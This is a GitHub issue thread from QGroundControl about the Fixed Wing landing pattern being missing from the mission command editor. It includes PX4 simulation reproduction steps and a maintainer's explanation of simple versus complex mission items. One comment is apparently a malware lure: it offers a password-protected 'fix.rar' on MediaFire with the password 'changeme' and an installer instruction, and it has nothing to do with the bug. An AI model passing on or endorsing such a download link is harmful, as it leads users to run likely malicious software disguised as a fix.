mavlink/qgroundcontrol #11810: Show Fixed Wing landing pattern in "all commands"

gillamkid, 2024-08-26:
## Expected Behavior
It should only be possible to add a Landing of type "Fixed Wing Landing Pattern" when creating a flight plan if a Fixed Wing vehicle is connected.

## Current Behavior
The land button in the tool bar correctly creates a "Fixed Wing Landing Pattern" mission item, however when editing an existing mission item, it only shows landing options specific to VTOL and not options specific to fixed wing vehicles (namely "landing pattern")

## Steps to Reproduce:
1. run a gazebo plane
```
cd ~/src/PX4-Autopilot 
make px4_sitl gazebo-classic_plane_lidar
```
2. run QGC daily
3. Go to the "Plan" view
4. set takeoff point (press takeoff, click "done")
5. add waypoint (click "waypoint" in toolbar, click on map to set)
6. on the right side of the screen there is a properties panel for the waypoint just added. Click on the header (where it says "Waypoint", next to the trash icon) to view the "Select Mission Command" popup.
7. click on the "land" option
* it will add a land mission item, but it is a land mission item for VTOL, not Fixed Wing (ie. mission item does not have "Radius" property, only altitude)

another bug is "landing pattern" is not in the "all commands" section. Replace the last step from the instructions above with this new last step to see the issue

7. for the "Category" dropdown, select "all commands"
* the "landing pattern" option is not shown, however the normal VTOL "land" option is (if selected, the land mission item added will have no "radius" property)

## System Information
- Operating System: Ubuntu 22
- QGC Version: QGC daily AppImage

dseynhae, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

gillamkid, 2024-08-26:
This task can be assigned to me. Doesn't look like I have the ability to assign the task to myself.

DonLakeFlyer, 2024-08-26:
This is because Fixed Wing Landing Pattern is not a simple mission Item (which are what show up in All Commands). It is a complex mission item which has its own editor and visuals. Similar to Survey or Corridor Scan. A landing pattern is comprised of multiple mavlink mission commands (https://github.com/mavlink/qgroundcontrol/blob/master/src/MissionManager/LandingComplexItem.cc#L356). A "Simple" mission item is a single mavlink command. The two don't mix in the current ui. It would  require a major rework of the paradigm for simple/complex mission items.

closed 2026-10-05 by github-actions[bot]